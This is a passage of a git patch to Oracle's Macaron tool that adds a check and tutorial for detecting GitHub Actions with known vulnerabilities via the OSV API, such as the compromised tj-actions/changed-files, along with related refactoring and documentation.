From 9776ec80554517bb79e84d9ee508f5d1db12837e Mon Sep 17 00:00:00 2001 From: behnazh-w Date: Fri, 21 Mar 2025 17:35:35 +1000 Subject: [PATCH] feat: detect vulnerable GitHub Actions Signed-off-by: behnazh-w --- docs/source/glossary.rst | 5 + docs/source/index.rst | 21 +- .../pages/cli_usage/command_analyze.rst | 2 +- ...macaron.slsa_analyzer.package_registry.rst | 20 +- .../detect_vulnerable_github_actions.rst | 202 +++++++++ docs/source/pages/tutorials/index.rst | 1 + src/macaron/config/defaults.ini | 6 + src/macaron/database/db_custom_types.py | 102 ++++- src/macaron/repo_finder/repo_finder.py | 45 +- .../checks/detect_malicious_metadata_check.py | 51 +-- .../github_actions_vulnerability_check.py | 193 +++++++++ .../ci_service/github_actions/analyzer.py | 6 +- src/macaron/slsa_analyzer/git_url.py | 78 +++- .../slsa_analyzer/package_registry/osv_dev.py | 395 ++++++++++++++++++ .../oracle-macaron/check_results_policy.dl | 11 + .../test.yaml | 13 +- .../policy_purl.dl} | 1 + .../policy_repo_url.dl | 10 + .../cases/org_apache_logging_log4j/test.yaml | 33 ++ .../Bradford1040_mainsail_check_locale.yml | 60 +++ .../tj-actions_changed-files_query.json | 229 ++++++++++ .../tj-actions_changed-files_querybatch.json | 19 + .../test_detect_malicious_metadata_check.py | 6 +- ...test_github_actions_vulnerability_check.py | 105 +++++ .../package_registry/test_osv_dev.py | 220 ++++++++++ 25 files changed, 1721 insertions(+), 113 deletions(-) create mode 100644 docs/source/pages/tutorials/detect_vulnerable_github_actions.rst create mode 100644 src/macaron/slsa_analyzer/checks/github_actions_vulnerability_check.py create mode 100644 src/macaron/slsa_analyzer/package_registry/osv_dev.py create mode 100644 tests/integration/cases/oracle-macaron/check_results_policy.dl rename tests/integration/cases/{log4j_release_pipeline => oracle-macaron}/test.yaml (56%) rename tests/integration/cases/{log4j_release_pipeline/policy.dl => org_apache_logging_log4j/policy_purl.dl} (94%) create mode 
100644 tests/integration/cases/org_apache_logging_log4j/policy_repo_url.dl create mode 100644 tests/integration/cases/org_apache_logging_log4j/test.yaml create mode 100644 tests/slsa_analyzer/checks/resources/github/workflow_files/Bradford1040_mainsail_check_locale.yml create mode 100644 tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_query.json create mode 100644 tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_querybatch.json create mode 100644 tests/slsa_analyzer/checks/test_github_actions_vulnerability_check.py create mode 100644 tests/slsa_analyzer/package_registry/test_osv_dev.py diff --git a/docs/source/glossary.rst b/docs/source/glossary.rst index 72c36afce..4be476803 100644 --- a/docs/source/glossary.rst +++ b/docs/source/glossary.rst @@ -23,3 +23,8 @@ Glossary * Witness is a tool that wraps a build command and records various types of information in a provenance document in the ``in-toto`` format as the build execution happens. * URL: https://github.com/in-toto/witness + + PURL + + * Package URL identifier + * URL: https://github.com/package-url/purl-spec/blob/master/PURL-SPECIFICATION.rst diff --git a/docs/source/index.rst b/docs/source/index.rst index 016f6f544..0e26ddcc5 100644 --- a/docs/source/index.rst +++ b/docs/source/index.rst @@ -46,12 +46,12 @@ Current checks in Macaron The table below shows the current set of actionable checks derived from the requirements that are currently supported by Macaron. -.. list-table:: Mapping SLSA requirements to Macaron checks +.. list-table:: Macaron checks descriptions :widths: 20 40 40 :header-rows: 1 * - Check ID - - SLSA requirement + - Summary - Concrete check * - ``mcn_build_tool_1`` - **Build tool exists** - The source code repository includes configurations for a supported build tool used to produce the software component. @@ -95,19 +95,12 @@ the requirements that are currently supported by Macaron. 
* - ``mcn_scm_authenticity_check_1`` - **Source repo authenticity** - Check whether the claims of a source code repository made by a package can be corroborated. - If the source code repository contains conflicting evidence regarding its claim of the source code repository, this check will fail. If no source code repository or corroborating evidence is found, or if the build system is unsupported, the check will return ``UNKNOWN`` as the result. This check currently supports only Maven artifacts. - -**************************************************************************************** -Macaron checks that report integrity issues but do not map to SLSA requirements directly -**************************************************************************************** - -.. list-table:: - :widths: 20 40 - :header-rows: 1 - - * - Check ID - - Description * - ``mcn_detect_malicious_metadata_1`` - - This check performs analysis on PyPI package metadata to detect malicious behavior. It also reports known malware from other ecosystems, but the analysis is currently limited to PyPI packages. + - **Malicious code detection** - Check whether the source code or package metadata has indicators of compromise. + - This check performs analysis on PyPI package metadata to detect malicious behavior. It also reports known malware from other ecosystems. + * - ``mcn_githubactions_vulnerabilities_1`` + - **Detect vulnerable GitHub Actions** - Check whether the GitHub Actions called from the corresponding repo have known vulnerabilities. + - This check identifies third-party GitHub Actions used in a repository and reports any known vulnerabilities associated with the used versions. ---------------------- How does Macaron work? 
diff --git a/docs/source/pages/cli_usage/command_analyze.rst b/docs/source/pages/cli_usage/command_analyze.rst index a04f88bd2..bd42334ed 100644 --- a/docs/source/pages/cli_usage/command_analyze.rst +++ b/docs/source/pages/cli_usage/command_analyze.rst @@ -1,4 +1,4 @@ -.. Copyright (c) 2023 - 2023, Oracle and/or its affiliates. All rights reserved. +.. Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. .. Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. .. _analyze-command-cli: diff --git a/docs/source/pages/developers_guide/apidoc/macaron.slsa_analyzer.package_registry.rst b/docs/source/pages/developers_guide/apidoc/macaron.slsa_analyzer.package_registry.rst index ae98919bb..36659c1b3 100644 --- a/docs/source/pages/developers_guide/apidoc/macaron.slsa_analyzer.package_registry.rst +++ b/docs/source/pages/developers_guide/apidoc/macaron.slsa_analyzer.package_registry.rst @@ -3,8 +3,8 @@ macaron.slsa\_analyzer.package\_registry package .. automodule:: macaron.slsa_analyzer.package_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: Submodules ---------- @@ -14,45 +14,53 @@ macaron.slsa\_analyzer.package\_registry.deps\_dev module .. automodule:: macaron.slsa_analyzer.package_registry.deps_dev :members: - :undoc-members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.jfrog\_maven\_registry module ---------------------------------------------------------------------- .. automodule:: macaron.slsa_analyzer.package_registry.jfrog_maven_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.maven\_central\_registry module ------------------------------------------------------------------------ .. 
automodule:: macaron.slsa_analyzer.package_registry.maven_central_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.npm\_registry module ------------------------------------------------------------- .. automodule:: macaron.slsa_analyzer.package_registry.npm_registry :members: + :show-inheritance: :undoc-members: + +macaron.slsa\_analyzer.package\_registry.osv\_dev module +-------------------------------------------------------- + +.. automodule:: macaron.slsa_analyzer.package_registry.osv_dev + :members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.package\_registry module ----------------------------------------------------------------- .. automodule:: macaron.slsa_analyzer.package_registry.package_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: macaron.slsa\_analyzer.package\_registry.pypi\_registry module -------------------------------------------------------------- .. automodule:: macaron.slsa_analyzer.package_registry.pypi_registry :members: - :undoc-members: :show-inheritance: + :undoc-members: diff --git a/docs/source/pages/tutorials/detect_vulnerable_github_actions.rst b/docs/source/pages/tutorials/detect_vulnerable_github_actions.rst new file mode 100644 index 000000000..645ea9a03 --- /dev/null +++ b/docs/source/pages/tutorials/detect_vulnerable_github_actions.rst @@ -0,0 +1,202 @@ +.. Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +.. Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +.. _detect-vuln-gh-actions: + +======================================= +How to detect vulnerable GitHub Actions +======================================= + +This tutorial explains how to use a check in Macaron that detects vulnerable third-party GitHub Actions. 
This check is important for preventing security issues in your CI/CD pipeline, especially in light of recent incidents, such as vulnerabilities discovered in popular GitHub Actions like `tj-actions/changed-files <https://github.com/tj-actions/changed-files>`_, and `reviewdog/action-setup <https://github.com/reviewdog/action-setup>`_. + +We will guide you on how to enable and use this check to enhance the security of your development pipeline. + +For more information on other features of Macaron, please refer to the :ref:`documentation here <index>`. + +.. contents:: :local: + +------------ +Introduction +------------ + +In March 2025, CISA (Cybersecurity and Infrastructure Security Agency) issued an `alert <https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066>`_ about a critical supply chain attack affecting third-party GitHub Actions. The incidents, identified as `CVE-2025-30066 <https://nvd.nist.gov/vuln/detail/CVE-2025-30066>`_ and `CVE-2025-30154 <https://nvd.nist.gov/vuln/detail/CVE-2025-30154>`_, targeted the widely used GitHub Actions ``tj-actions/changed-files`` and ``reviewdog/action-setup``, respectively. These actions were compromised, allowing attackers to manipulate CI/CD pipelines and potentially inject malicious code into repositories. + +Macaron now includes a check for detecting vulnerable third-party GitHub Actions that are used in repositories, preventing the potential misuse of these actions. + +------------------------------------------- +The Check: Detect Vulnerable GitHub Actions +------------------------------------------- + +Macaron's check, ``mcn_githubactions_vulnerabilities_1``, identifies third-party GitHub Actions and reports any known vulnerabilities associated with the versions used in your repository. + + +**Key Features of this Check:** + +- **Vulnerability Detection**: It scans the repository’s workflow files and checks for any known vulnerabilities in the GitHub Actions used. +- **Version Checks**: It verifies the versions of the GitHub Actions being used, comparing them against a list of known vulnerabilities. +- **Security Prevention**: Helps prevent security breaches by ensuring that your workflows are free from compromised actions.
+- **Continuous Monitoring**: As GitHub Actions are updated, you can enforce a policy to continuously track and address emerging threats, ensuring that your security posture remains up-to-date. + +----------------------------------------------------------- +How to Use the GitHub Actions Vulnerability Detection Check +----------------------------------------------------------- + +****************************** +Installation and Prerequisites +****************************** + +Skip this section if you already know how to install Macaron. + +.. toggle:: + + Please follow the instructions :ref:`here `. In summary, you need: + + * Docker + * the ``run_macaron.sh`` script to run the Macaron image. + * sqlite3 + + .. note:: At the moment, Docker alternatives (e.g. podman) are not supported. + + + You also need to provide Macaron with a GitHub token through the ``GITHUB_TOKEN`` environment variable. + + To obtain a GitHub Token: + + * Go to ``GitHub settings`` → ``Developer Settings`` (at the bottom of the left side pane) → ``Personal Access Tokens`` → ``Fine-grained personal access tokens`` → ``Generate new token``. Give your token a name and an expiry period. + * Under ``"Repository access"``, choosing ``"Public Repositories (read-only)"`` should be good enough in most cases. + + Now you should be good to run Macaron. For more details, see the documentation :ref:`here `. + +*************** +Running Macaron +*************** + +To use the GitHub Actions Vulnerability Detection check in Macaron, you can either provide the repository URL or use the :term:`PURL` of the package. Macaron will automatically resolve the repository if you choose the PURL approach. For more details, refer to the :ref:`CLI options` of the ``analyze`` command. + ++++++++++++++++++++++++++ +Using the Repository Path ++++++++++++++++++++++++++ + +As an example, we will check if the https://github.com/apache/logging-log4j2 repository calls any vulnerable GitHub Actions. 
First, execute the ``analyze`` command as follows: + +.. code-block:: shell + + ./run_macaron.sh analyze -rp https://github.com/apache/logging-log4j2 + +Next, ensure that the ``mcn_githubactions_vulnerabilities_1`` check passes for the repository. You can create a simple policy like the one below and store it in a file (e.g., ``check_github_actions_vuln.dl``): + +.. code-block:: prolog + + Policy("github_actions_vulns", component_id, "GitHub Actions Vulnerability Detection") :- + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"). + + apply_policy_to("github_actions_vulns", component_id) :- + is_repo_url(component_id, "https://github.com/apache/logging-log4j2"). + +Run the ``verify-policy`` command to check if the ``mcn_githubactions_vulnerabilities_1`` check is successful. + +.. code-block:: shell + + ./run_macaron.sh verify-policy --database ./output/macaron.db --file ./check_github_actions_vuln.dl + +++++++++++++++ +Using the PURL +++++++++++++++ + +Alternatively, run the ``analyze`` command with the PURL of a package: + +.. code-block:: shell + + ./run_macaron.sh analyze -purl pkg:maven/org.apache.logging.log4j/log4j-core@3.0.0-beta3 + +Then, ensure that the ``mcn_githubactions_vulnerabilities_1`` check passes for the component. You can create a similar policy to the one shown earlier and store it in a file (e.g., ``check_github_actions_vuln.dl``): + +.. code-block:: prolog + + Policy("github_actions_vulns", component_id, "GitHub Actions Vulnerability Detection") :- + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"). + + apply_policy_to("github_actions_vulns", component_id) :- + is_component(component_id, purl), + match("pkg:maven/org.apache.logging.log4j/log4j-core@.*", purl). + +Run the ``verify-policy`` command to verify that the check passes: + +.. 
code-block:: shell + + ./run_macaron.sh verify-policy --database ./output/macaron.db --file ./check_github_actions_vuln.dl + +****************** +Review the Results +****************** + +Macaron stores the results in a local database and generates HTML and JSON reports. If the ``verify-policy`` step fails, you can retrieve detailed information about the vulnerable repositories from the database. For a quick overview, refer to the HTML report located in the ``output/reports`` directory, such as: + +- ``output/reports/github_com/apache/logging-log4j2/logging-log4j2.html`` (for repository path analysis) +- ``output/reports/maven/org_apache_logging_log4j/log4j-core/log4j-core.html`` (for PURL analysis) + +For comprehensive results, query the local database with the following command: + +.. code-block:: shell + + sqlite3 -json output/macaron.db "SELECT * FROM github_actions_vulnerabilities_check;" | jq + +.. code-block:: json + + [ + { + "id": 1, + "vulnerability_urls": "[\"https://osv.dev/vulnerability/GHSA-mrrh-fwg8-r2c3\"]", + "github_actions_id": "tj-actions/changed-files", + "github_actions_version": "v41", + "caller_workflow": "https://github.com/OWNER/REPO/blob/4d59c62f42b7f5c08e31f6eb401a4e35355fe077/.github/workflows/workflow.yml" + } + ] + +**Output Breakdown:** + +- **id**: Unique identifier for this specific report in the database. +- **vulnerability_urls**: List of URLs pointing to published vulnerability advisories for the identified GitHub Action. +- **github_actions_id**: The identifier of the vulnerable GitHub Action, formatted as ``OWNER/REPO``. +- **github_actions_version**: The version of the GitHub Action that contains the vulnerability. +- **caller_workflow**: URL to the GitHub workflow file that is calling the affected action. + +The output is machine-readable, making it suitable for further analysis, automation, or integration with other security tools. + +.. 
note:: + + The ``OWNER`` and ``REPO`` in the ``caller_workflow`` field are anonymized to protect the privacy of the repository being analyzed. + +********** +Mitigation +********** + +To mitigate the vulnerability, review the advisory linked in the ``vulnerability_urls`` field and identify the patched version of the GitHub Action. Follow security best practices by pinning the vulnerable action to a fixed version, using the commit SHA for the patched version. This ensures that security updates are incorporated while maintaining the stability of your workflow. + +For example, to pin the ``tj-actions/changed-files`` action to a specific version: + +.. code-block:: yaml + + uses: tj-actions/changed-files@823fcebdb31bb35fdf2229d9f769b400309430d0 # v46.0.3 + +Refer to GitHub's security hardening guide for more information on managing third-party actions securely: `GitHub Security `_. + +--------------------- +Why This is Important +--------------------- + +In the aftermath of the supply chain compromise in March 2025, securing your CI/CD pipeline is more important than ever. GitHub Actions are widely used to automate development processes, but relying on third-party actions that could be compromised poses a significant risk. + +By using the ``mcn_githubactions_vulnerabilities_1`` check in Macaron, you can proactively secure your repositories. It helps identify and mitigate risks early in the development process, ensuring that your workflows are running trusted and secure actions. + +As third-party libraries and tools continue to grow in popularity, security risks from supply chain attacks will only increase. Regularly checking for vulnerabilities in the GitHub Actions used in your projects is an essential step toward maintaining a secure development environment. + +---------- +Conclusion +---------- + +In this tutorial, we've shown you how to use Macaron to detect vulnerable third-party GitHub Actions in your repository. 
By integrating this check into your pipeline, you can prevent security breaches caused by compromised or vulnerable actions. This is especially important following the recent `CVE-2025-30066 `_ report, which highlights the need for robust security measures in CI/CD pipelines. + +Make sure to stay up to date with Macaron’s security checks to protect your project from emerging threats. + +For more information about using Macaron and other checks, please refer to the full list of our checks: :ref:`here `. diff --git a/docs/source/pages/tutorials/index.rst b/docs/source/pages/tutorials/index.rst index 75869113f..d16c56f70 100644 --- a/docs/source/pages/tutorials/index.rst +++ b/docs/source/pages/tutorials/index.rst @@ -19,6 +19,7 @@ For the full list of supported technologies, such as CI services, registries, an commit_finder detect_malicious_package + detect_vulnerable_github_actions npm_provenance detect_malicious_java_dep generate_verification_summary_attestation diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index 0ccad65c4..c575cb76e 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -544,6 +544,12 @@ url_netloc = api.deps.dev url_scheme = https purl_endpoint = v3alpha/purl +[osv_dev] +url_netloc = api.osv.dev +url_scheme = https +query_endpoint = v1/query +querybatch_endpoint = v1/querybatch + # Configuration options for selecting the checks to run. # Both the exclude and include are defined as list of strings: # - The exclude list is used to specify the checks that will not run. 
diff --git a/src/macaron/database/db_custom_types.py b/src/macaron/database/db_custom_types.py index e67d22b3a..d4edc8075 100644 --- a/src/macaron/database/db_custom_types.py +++ b/src/macaron/database/db_custom_types.py @@ -80,25 +80,115 @@ class DBJsonDict(TypeDecorator): # pylint: disable=W0223 #: :meta private: cache_ok = True - def process_bind_param(self, value: None | dict, dialect: Any) -> None | dict: + def process_bind_param(self, value: None | dict, dialect: Any) -> dict: """Process when storing a dict object to the SQLite db. - value: None | dict - The value being stored. + Parameters + ---------- + value : None | dict + The value to be stored in the database. This should be a dict; otherwise, a TypeError is raised. + dialect : Any + The dialect in use (not directly used in this method). + + Returns + ------- + dict + The processed value, which must be a dict. + + Raises + ------ + TypeError + If the value is not a dict. """ if not isinstance(value, dict): raise TypeError("DBJsonDict type expects a dict.") return value - def process_result_value(self, value: None | dict, dialect: Any) -> None | dict: + def process_result_value(self, value: None | dict, dialect: Any) -> dict: """Process when loading a dict object from the SQLite db. - value: None | dict - The value being loaded. + Parameters + ---------- + value : None | dict + The value loaded from the database. This should be a dictionary; otherwise, a TypeError is raised. + dialect : Any + The dialect in use (not directly used in this method). + + Returns + ------- + dict + The processed value, which must be a dictionary. + + Raises + ------ + TypeError + If the value is not a dictionary. """ if not isinstance(value, dict): raise TypeError("DBJsonDict type expects a dict.") + + return value + + +class DBJsonList(TypeDecorator): # pylint: disable=W0223 + """SQLAlchemy column type to serialize lists.""" + + # It is stored in the database as a json value. 
+ impl = JSON + + # To prevent Sphinx from rendering the docstrings for `cache_ok`, make this docstring private. + #: :meta private: + cache_ok = True + + def process_bind_param(self, value: None | list, dialect: Any) -> list: + """Process when storing a list object to the SQLite db. + + Parameters + ---------- + value : None | list + The value to be stored in the database. This should be a list; otherwise, a TypeError is raised. + dialect : Any + The dialect in use (not directly used in this method). + + Returns + ------- + list + The processed value, which must be a list. + + Raises + ------ + TypeError + If the value is not a list. + """ + if not isinstance(value, list): + raise TypeError("DBJsonList type expects a list.") + + return value + + def process_result_value(self, value: None | list, dialect: Any) -> list: + """Process when loading a list object from the SQLite db. + + Parameters + ---------- + value : None | list + The value loaded from the database. This should be a list; otherwise, a TypeError is raised. + dialect : Any + The dialect in use (not directly used in this method). + + Returns + ------- + list + The processed value, which must be a list. + + Raises + ------ + TypeError + If the value is not a list. 
+ """ + if not isinstance(value, list): + raise TypeError("DBJsonList type expects a list.") + return value diff --git a/src/macaron/repo_finder/repo_finder.py b/src/macaron/repo_finder/repo_finder.py index f98f2688e..b19eb53a0 100644 --- a/src/macaron/repo_finder/repo_finder.py +++ b/src/macaron/repo_finder/repo_finder.py @@ -61,9 +61,9 @@ get_remote_origin_of_local_repo, get_remote_vcs_url, get_repo_dir_name, + get_tags_via_git_remote, is_empty_repo, is_remote_repo, - list_remote_references, resolve_local_path, ) @@ -337,49 +337,6 @@ def get_latest_repo_if_different(latest_version_purl: PackageURL, original_repo: return latest_repo -def get_tags_via_git_remote(repo: str) -> dict[str, str] | None: - """Retrieve all tags from a given repository using ls-remote. - - Parameters - ---------- - repo: str - The repository to perform the operation on. - - Returns - ------- - dict[str] - A dictionary of tags mapped to their commits, or None if the operation failed.. - """ - tag_data = list_remote_references(["--tags"], repo) - if not tag_data: - return None - tags = {} - - for tag_line in tag_data.splitlines(): - tag_line = tag_line.strip() - if not tag_line: - continue - split = tag_line.split("\t") - if len(split) != 2: - continue - possible_tag = split[1] - if possible_tag.endswith("^{}"): - possible_tag = possible_tag[:-3] - elif possible_tag in tags: - # If a tag already exists, it must be the annotated reference of an annotated tag. - # In that case we skip the tag as it does not point to the proper source commit. - # Note that this should only happen if the tags are received out of standard order. 
- continue - possible_tag = possible_tag.replace("refs/tags/", "") - if not possible_tag: - continue - tags[possible_tag] = split[0] - - logger.debug("Found %s tags via ls-remote of %s", len(tags), repo) - - return tags - - def prepare_repo( target_dir: str, repo_path: str, diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 80439bb79..5bec23b7b 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -5,7 +5,6 @@ import logging -import requests from problog import get_evaluatable from problog.logic import Term from problog.program import PrologString @@ -34,16 +33,16 @@ from macaron.slsa_analyzer.checks.base_check import BaseCheck from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType from macaron.slsa_analyzer.package_registry.deps_dev import APIAccessError, DepsDevService +from macaron.slsa_analyzer.package_registry.osv_dev import OSVDevService from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset, PyPIRegistry from macaron.slsa_analyzer.registry import registry from macaron.slsa_analyzer.specs.package_registry_spec import PackageRegistryInfo -from macaron.util import send_post_http_raw logger: logging.Logger = logging.getLogger(__name__) class MaliciousMetadataFacts(CheckFacts): - """The ORM mapping for justifications in pypi heuristic check.""" + """The ORM mapping for justifications in malicious metadata check.""" __tablename__ = "_detect_malicious_metadata_check" @@ -71,14 +70,10 @@ class MaliciousMetadataFacts(CheckFacts): class DetectMaliciousMetadataCheck(BaseCheck): """This check analyzes the metadata of a package for malicious behavior.""" - # The OSV knowledge base query database. 
- osv_query_url = "https://api.osv.dev/v1/query" - def __init__(self) -> None: """Initialize a check instance.""" check_id = "mcn_detect_malicious_metadata_1" description = """This check analyzes the metadata of a package based on reports malicious behavior. - Supported ecosystem for unknown malware: PyPI. """ super().__init__(check_id=check_id, description=description, eval_reqs=[]) @@ -222,8 +217,6 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: package_registry_info_entries = ctx.dynamic_data["package_registries"] # First check if this package is a known malware - data = {"package": {"purl": ctx.component.purl}} - try: package_exists = bool(DepsDevService.get_package_info(ctx.component.purl)) except APIAccessError as error: @@ -231,29 +224,27 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # Known malicious packages must have been removed. if not package_exists: - response = send_post_http_raw(self.osv_query_url, json_data=data, headers=None) - res_obj = None - if response: - try: - res_obj = response.json() - except requests.exceptions.JSONDecodeError as error: - logger.debug("Unable to get a valid response from %s: %s", self.osv_query_url, error) - if res_obj: - for vuln in res_obj.get("vulns", {}): - if v_id := json_extract(vuln, ["id"], str): - result_tables.append( - MaliciousMetadataFacts( - known_malware=f"https://osv.dev/vulnerability/{v_id}", - result={}, - detail_information=vuln, - confidence=Confidence.HIGH, - ) + vulns: list = [] + try: + vulns = OSVDevService.get_vulnerabilities_purl(ctx.component.purl) + except APIAccessError as error: + logger.debug(error) + + for vuln in vulns: + if v_id := json_extract(vuln, ["id"], str): + result_tables.append( + MaliciousMetadataFacts( + known_malware=f"https://osv.dev/vulnerability/{v_id}", + result={}, + detail_information=vuln, + confidence=Confidence.HIGH, ) - if result_tables: - return CheckResultData( - result_tables=result_tables, - result_type=CheckResultType.FAILED, ) 
+ if result_tables: + return CheckResultData( + result_tables=result_tables, + result_type=CheckResultType.FAILED, + ) # If the package is not a known malware, run malware analysis heuristics. for package_registry_info_entry in package_registry_info_entries: diff --git a/src/macaron/slsa_analyzer/checks/github_actions_vulnerability_check.py b/src/macaron/slsa_analyzer/checks/github_actions_vulnerability_check.py new file mode 100644 index 000000000..2635e70c7 --- /dev/null +++ b/src/macaron/slsa_analyzer/checks/github_actions_vulnerability_check.py @@ -0,0 +1,193 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""This module contains the implementation of the GitHub Actions vulnerabilities check.""" + +import logging +import os + +from sqlalchemy import ForeignKey, String +from sqlalchemy.orm import Mapped, mapped_column + +from macaron.database.db_custom_types import DBJsonList +from macaron.database.table_definitions import CheckFacts +from macaron.errors import APIAccessError +from macaron.json_tools import json_extract +from macaron.slsa_analyzer.analyze_context import AnalyzeContext +from macaron.slsa_analyzer.checks.base_check import BaseCheck, CheckResultType +from macaron.slsa_analyzer.checks.check_result import CheckResultData, Confidence, JustificationType +from macaron.slsa_analyzer.ci_service.github_actions.analyzer import GitHubWorkflowNode, GitHubWorkflowType +from macaron.slsa_analyzer.package_registry.osv_dev import OSVDevService +from macaron.slsa_analyzer.registry import registry +from macaron.slsa_analyzer.slsa_req import ReqName + +logger: logging.Logger = logging.getLogger(__name__) + + +class GitHubActionsVulnsFacts(CheckFacts): + """The ORM mapping for justifications in the GitHub Actions vulnerabilities check.""" + + __tablename__ = "_github_actions_vulnerabilities_check" + + #: The primary key. 
+ id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 + + #: The list of vulnerability URLs. + vulnerability_urls: Mapped[list[str]] = mapped_column( + DBJsonList, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: The GitHub Action Identifier. + github_actions_id: Mapped[str] = mapped_column( + String, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: The GitHub Action version. + github_actions_version: Mapped[str] = mapped_column( + String, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: The GitHub Action workflow that calls the vulnerable GitHub Action. + caller_workflow: Mapped[str] = mapped_column(String, nullable=False, info={"justification": JustificationType.HREF}) + + __mapper_args__ = { + "polymorphic_identity": "_github_actions_vulnerabilities_check", + } + + +class GitHubActionsVulnsCheck(BaseCheck): + """This check verifies whether the GitHub Actions called from the corresponding repo have known vulnerabilities. + + Note: This check analyzes the direct GitHub Actions dependencies only. + TODO: Check GitHub Actions dependencies recursively. + """ + + def __init__(self) -> None: + """Initialize instance.""" + check_id = "mcn_githubactions_vulnerabilities_1" + description = "Check whether the GitHub Actions called from the corresponding repo have known vulnerabilities." + depends_on: list[tuple[str, CheckResultType]] = [("mcn_version_control_system_1", CheckResultType.PASSED)] + eval_reqs = [ReqName.SECURITY] + super().__init__(check_id=check_id, description=description, depends_on=depends_on, eval_reqs=eval_reqs) + + def run_check(self, ctx: AnalyzeContext) -> CheckResultData: + """Implement the check in this method. + + Parameters + ---------- + ctx : AnalyzeContext + The object containing processed data for the target repo. + + Returns + ------- + CheckResultData + The result of the check.
+ """ + result_tables: list[CheckFacts] = [] + + ci_services = ctx.dynamic_data["ci_services"] + + external_workflows: dict[str, list] = {} + for ci_info in ci_services: + for callee in ci_info["callgraph"].bfs(): + if isinstance(callee, GitHubWorkflowNode) and callee.node_type in [ + GitHubWorkflowType.EXTERNAL, + GitHubWorkflowType.REUSABLE, + ]: + if "@" in callee.name: + workflow_name, workflow_version = callee.name.split("@") + else: + # Most likely we have encountered an internal reusable workflow, which + # can be skipped. + logger.debug("GitHub Actions workflow %s misses a version. Skipping...", callee.name) + continue + + caller_path = callee.caller.source_path if callee.caller else None + + if not workflow_name: + logger.debug("Workflow %s is not relevant. Skipping...", callee.name) + continue + + ext_workflow: list = external_workflows.get(workflow_name, []) + ext_workflow.append( + { + "version": workflow_version, + "caller_path": ci_info["service"].api_client.get_file_link( + ctx.component.repository.full_name, + ctx.component.repository.commit_sha, + file_path=( + ci_info["service"].api_client.get_relative_path_of_workflow( + os.path.basename(caller_path) + ) + if caller_path + else "" + ), + ), + } + ) + external_workflows[workflow_name] = ext_workflow + + # If no external GitHub Actions are found, return passed result. + if not external_workflows: + return CheckResultData( + result_tables=[], + result_type=CheckResultType.PASSED, + ) + + # We first send a batch query to see which GitHub Actions are potentially vulnerable. + # OSV's querybatch returns minimal results but this allows us to only make subsequent + # queries to get vulnerability details when needed. 
+ batch_query = [{"name": k, "ecosystem": "GitHub Actions"} for k, _ in external_workflows.items()] + batch_vulns = [] + try: + batch_vulns = OSVDevService.get_vulnerabilities_package_name_batch(batch_query) + except APIAccessError as error: + logger.debug(error) + + for vuln_res in batch_vulns: + vulns: list = [] + workflow_name = vuln_res["name"] + try: + vulns = OSVDevService.get_vulnerabilities_package_name(ecosystem="GitHub Actions", name=workflow_name) + except APIAccessError as error: + logger.debug(error) + continue + for workflow_inv in external_workflows[workflow_name]: + vuln_mapping = [] + for vuln in vulns: + if v_id := json_extract(vuln, ["id"], str): + try: + if OSVDevService.is_version_affected( + vuln, + workflow_name, + workflow_inv["version"], + "GitHub Actions", + source_repo=f"https://github.com/{workflow_name}", + ): + vuln_mapping.append(f"https://osv.dev/vulnerability/{v_id}") + except APIAccessError as error: + logger.debug(error) + if vuln_mapping: + result_tables.append( + GitHubActionsVulnsFacts( + vulnerability_urls=vuln_mapping, + github_actions_id=workflow_name, + github_actions_version=workflow_inv["version"], + caller_workflow=workflow_inv["caller_path"], + confidence=Confidence.HIGH, + ) + ) + + if result_tables: + return CheckResultData( + result_tables=result_tables, + result_type=CheckResultType.FAILED, + ) + + return CheckResultData( + result_tables=[], + result_type=CheckResultType.PASSED, + ) + + +registry.register(GitHubActionsVulnsCheck()) diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py index 2f0e49888..4565c2098 100644 --- a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py +++ b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. 
